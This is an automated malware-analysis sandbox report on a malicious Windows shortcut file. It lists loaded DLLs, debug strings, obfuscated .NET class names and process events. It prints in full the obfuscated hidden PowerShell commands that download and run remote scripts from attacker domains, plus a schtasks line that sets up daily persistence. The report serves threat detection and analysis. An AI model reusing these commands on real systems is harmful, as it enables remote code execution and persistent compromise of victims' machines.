                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: websocket.dll
                Source: BX7yRz7XqF.lnkLNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000A.00000002.1474008637.000002487F140000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000A.00000002.1472696900.000002487ECEE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Adobe.pdb source: powershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: Adobe.pdb( source: powershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1672029257.000001D1C9810000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000A.00000002.1472696900.000002487ED98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb@ source: powershell.exe, 0000000A.00000002.1474008637.000002487F0E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.1672029257.000001D1C9810000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n.pdb source: powershell.exe, 0000000A.00000002.1474008637.000002487F0E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1672029257.000001D1C9810000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000A.00000002.1472696900.000002487ED98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb^ source: powershell.exe, 0000000F.00000002.1672029257.000001D1C9810000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdbPi source: powershell.exe, 0000000F.00000002.1669768304.000001D1C956B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.1474008637.000002487F14A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1669768304.000001D1C956B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1474008637.000002487F0E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer328 source: powershell.exe, 0000000A.00000002.1474008637.000002487F0E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ion.pdb source: powershell.exe, 0000000A.00000002.1474008637.000002487F0E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb source: powershell.exe, 0000000A.00000002.1474008637.000002487F140000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: pdbpdblib.pdb source: powershell.exe, 0000000F.00000002.1669768304.000001D1C956B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000A.00000002.1474008637.000002487F140000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000A.00000002.1474008637.000002487F14A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.pdb source: powershell.exe, 0000000F.00000002.1672029257.000001D1C9810000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb+ source: powershell.exe, 0000000A.00000002.1474008637.000002487F0E2000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, SadyrWrGPJB6lfcrNhY.cs.Net Code: Type.GetTypeFromHandle(JyrbaQ4wAZuS14vdfkV.Ao6N8FHwSP(16777284)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(JyrbaQ4wAZuS14vdfkV.Ao6N8FHwSP(16777254)),Type.GetTypeFromHandle(JyrbaQ4wAZuS14vdfkV.Ao6N8FHwSP(16777327))})
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, SadyrWrGPJB6lfcrNhY.cs.Net Code: Type.GetTypeFromHandle(JyrbaQ4wAZuS14vdfkV.Ao6N8FHwSP(16777284)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(JyrbaQ4wAZuS14vdfkV.Ao6N8FHwSP(16777254)),Type.GetTypeFromHandle(JyrbaQ4wAZuS14vdfkV.Ao6N8FHwSP(16777327))})
                Obfuscated command line found
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell
                Suspicious powershell command line found
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC4900BD pushad ; iretd 0_2_00007FFAAC4900C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC48776A pushad ; iretd 10_2_00007FFAAC48785D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC48785E push eax; iretd 10_2_00007FFAAC48786D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC4800BD pushad ; iretd 10_2_00007FFAAC4800C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC550EDE push ds; ret 10_2_00007FFAAC550EDF
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, SadyrWrGPJB6lfcrNhY.csHigh entropy of concatenated method names: 'SoenpAHEgXxkACBkrHF', 'IUobe2He6QkgC4jRF2l', 'wZsmTM3p4y', 'crYcw1HAUDvLY3RuwxL', 'Rq6dNsH7AxAr5cRaJ0E', 'KJlIfrHlKOxu1r5aHfB', 'if29hHHRI3MVvrdYSv8', 'w8YIvIHaQpacX1kAh2c', 'WgnVroHB46wfCn1uwxK', 'B26V5nHi0scRH1mePWV'
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, vuIfaIYIpZ8a74JL1JL.csHigh entropy of concatenated method names: 'so5LQ5b0pe', 'hAILrQmZ9F', 'R24Lm6paaQ', 'epdL4CeL3o', 'aIILsq7uOV', 'PtTLg33DgO', 'fCldGn9kjwyKP01lQkq', 'E0OPhy9QZesmt95BBWd', 'nRP6wd9rZui9EVEqm8R', 'tMIgFg9mlQHftg95xdZ'
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, WsClient.csHigh entropy of concatenated method names: 'MoveNext', 'MoveNext', 'SetStateMachine', 'SetStateMachine', 'ugMtKmBKAiyXTnqh7jw', 'hU5x4KB8iu3yD3y5BP1', 'rw0Vo1BIgFEw6JjiPfP', 'w3XxeRBTPYVf4jLOZjR', 'MoveNext', 'MoveNext'
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, RijndaelEncryptor.csHigh entropy of concatenated method names: 'Encrypt', 'Decrypt', 'gLj2yFBp0JwocFUqF5a', 'axVtwTB2fh5LRjPsDgr', 'bfaue6BoOHSinOY0U9p', 'Fw6jQ1BWtoEQRyCsG8o', 'mCAid1BsEOXuMOBq0Rd', 'h97e37BgT9Cja1VfpxK', 'RNQuS4Bd3cLv2SotDnu'
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, Sign.csHigh entropy of concatenated method names: 'MoveNext', 'MoveNext', 'SetStateMachine', 'SetStateMachine', 'k6d2Vki9cYHAPgpDnG7', 'j5huUciyG9RAw3o5erl', 'sxt9x8itL8XUwbZFMYI', 'MoveNext', 'MoveNext', 'SetStateMachine'
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, PvPREnlO66xbF75rA6.csHigh entropy of concatenated method names: 'svMa0uPlW', 'tIEBEEo4a', 'VkqixjgcO', 'TgqvIRL7B', 'qioNtiBeIuSmZ1FPYUQ', 'FReZgoBCxkdrVlPOsmX', 'XXrZPQB1DbSNH3x4F0d', 'vNwwRvBGPnXBAI2TISJ', 'Q1uySJBfy0M7FlZKH0h', 'KnTh8sBE0K7X05j3N76'
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, PyouRJ4V8xbHiGjOXDJ.csHigh entropy of concatenated method names: 'mApWxXxvMB', 'iwWWjOcxcH', 'a06WznSbKA', 'iswd32iZWB', 'YY4dYaVZ8M', 'qxJdLqLfsh', 'dmydkcYnBC', 'wCZsm4VHrY', 'vt9dQ9ZS3D', 'GywdrloPQN'
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, gC47ViYYR0A1mLLPoUJ.csHigh entropy of concatenated method names: 'j4sYkbPGYS', 'f3BYQPiTVw', 'ljiYrqWiax', 'doIYmEwG2k', 'UCfY4OLTIh', 'ShMm4Fiq6CP2k9BFxgX', 'npNTIliOH4l3Dybsfd2', 'sf8Y68iTGBZG5OXGeN0', 'KKpB0ci5eoPFLe6EiOF', 'QcVgLWixLwwdYc9db7E'
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, xoR3WRYdQIiY1KUtohJ.csHigh entropy of concatenated method names: 'sbHvxvyoPlZhAf7GYao', 'umWoWsyWDvdk2pXad6W', 'k85KDkyphFo6t0Kwl0k', 'ek7qNuy2RRDux4sVm8x', 'bp0NCyydvPdTkbNrQxt', 'a6MYf0rYnC', 'WTaYE77a3U', 'AtXYeIOl1v', 'PXgYCBpO00', 'Ba1Y1mSVhv'
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, xPDZ4aOFhJspDwMcqp.csHigh entropy of concatenated method names: 'XVJj0rXmB', 'ynfyk5iHe4iSLSCqxvn', 'TeiH4Ji687cQIrhINbN', 'AuOofHib2AQKPmukoLZ', 'nBMOMiiuS5wORvwYIWP', 'qOSKTWiFfkw12qH7aU8', 'gAQKj3iX9wsJYin0FMp', 'IWO1DsihoPiOBlv5cFl'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, SadyrWrGPJB6lfcrNhY.csHigh entropy of concatenated method names: 'SoenpAHEgXxkACBkrHF', 'IUobe2He6QkgC4jRF2l', 'wZsmTM3p4y', 'crYcw1HAUDvLY3RuwxL', 'Rq6dNsH7AxAr5cRaJ0E', 'KJlIfrHlKOxu1r5aHfB', 'if29hHHRI3MVvrdYSv8', 'w8YIvIHaQpacX1kAh2c', 'WgnVroHB46wfCn1uwxK', 'B26V5nHi0scRH1mePWV'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, vuIfaIYIpZ8a74JL1JL.csHigh entropy of concatenated method names: 'so5LQ5b0pe', 'hAILrQmZ9F', 'R24Lm6paaQ', 'epdL4CeL3o', 'aIILsq7uOV', 'PtTLg33DgO', 'fCldGn9kjwyKP01lQkq', 'E0OPhy9QZesmt95BBWd', 'nRP6wd9rZui9EVEqm8R', 'tMIgFg9mlQHftg95xdZ'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, WsClient.csHigh entropy of concatenated method names: 'MoveNext', 'MoveNext', 'SetStateMachine', 'SetStateMachine', 'ugMtKmBKAiyXTnqh7jw', 'hU5x4KB8iu3yD3y5BP1', 'rw0Vo1BIgFEw6JjiPfP', 'w3XxeRBTPYVf4jLOZjR', 'MoveNext', 'MoveNext'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, RijndaelEncryptor.csHigh entropy of concatenated method names: 'Encrypt', 'Decrypt', 'gLj2yFBp0JwocFUqF5a', 'axVtwTB2fh5LRjPsDgr', 'bfaue6BoOHSinOY0U9p', 'Fw6jQ1BWtoEQRyCsG8o', 'mCAid1BsEOXuMOBq0Rd', 'h97e37BgT9Cja1VfpxK', 'RNQuS4Bd3cLv2SotDnu'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, Sign.csHigh entropy of concatenated method names: 'MoveNext', 'MoveNext', 'SetStateMachine', 'SetStateMachine', 'k6d2Vki9cYHAPgpDnG7', 'j5huUciyG9RAw3o5erl', 'sxt9x8itL8XUwbZFMYI', 'MoveNext', 'MoveNext', 'SetStateMachine'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, PvPREnlO66xbF75rA6.csHigh entropy of concatenated method names: 'svMa0uPlW', 'tIEBEEo4a', 'VkqixjgcO', 'TgqvIRL7B', 'qioNtiBeIuSmZ1FPYUQ', 'FReZgoBCxkdrVlPOsmX', 'XXrZPQB1DbSNH3x4F0d', 'vNwwRvBGPnXBAI2TISJ', 'Q1uySJBfy0M7FlZKH0h', 'KnTh8sBE0K7X05j3N76'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, PyouRJ4V8xbHiGjOXDJ.csHigh entropy of concatenated method names: 'mApWxXxvMB', 'iwWWjOcxcH', 'a06WznSbKA', 'iswd32iZWB', 'YY4dYaVZ8M', 'qxJdLqLfsh', 'dmydkcYnBC', 'wCZsm4VHrY', 'vt9dQ9ZS3D', 'GywdrloPQN'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, gC47ViYYR0A1mLLPoUJ.csHigh entropy of concatenated method names: 'j4sYkbPGYS', 'f3BYQPiTVw', 'ljiYrqWiax', 'doIYmEwG2k', 'UCfY4OLTIh', 'ShMm4Fiq6CP2k9BFxgX', 'npNTIliOH4l3Dybsfd2', 'sf8Y68iTGBZG5OXGeN0', 'KKpB0ci5eoPFLe6EiOF', 'QcVgLWixLwwdYc9db7E'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, xoR3WRYdQIiY1KUtohJ.csHigh entropy of concatenated method names: 'sbHvxvyoPlZhAf7GYao', 'umWoWsyWDvdk2pXad6W', 'k85KDkyphFo6t0Kwl0k', 'ek7qNuy2RRDux4sVm8x', 'bp0NCyydvPdTkbNrQxt', 'a6MYf0rYnC', 'WTaYE77a3U', 'AtXYeIOl1v', 'PXgYCBpO00', 'Ba1Y1mSVhv'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, xPDZ4aOFhJspDwMcqp.csHigh entropy of concatenated method names: 'XVJj0rXmB', 'ynfyk5iHe4iSLSCqxvn', 'TeiH4Ji687cQIrhINbN', 'AuOofHib2AQKPmukoLZ', 'nBMOMiiuS5wORvwYIWP', 'qOSKTWiFfkw12qH7aU8', 'gAQKj3iX9wsJYin0FMp', 'IWO1DsihoPiOBlv5cFl'

                Persistence and Installation Behavior

                barindex
                Windows shortcut file (LNK) starts blacklisted processes
                Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /f
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
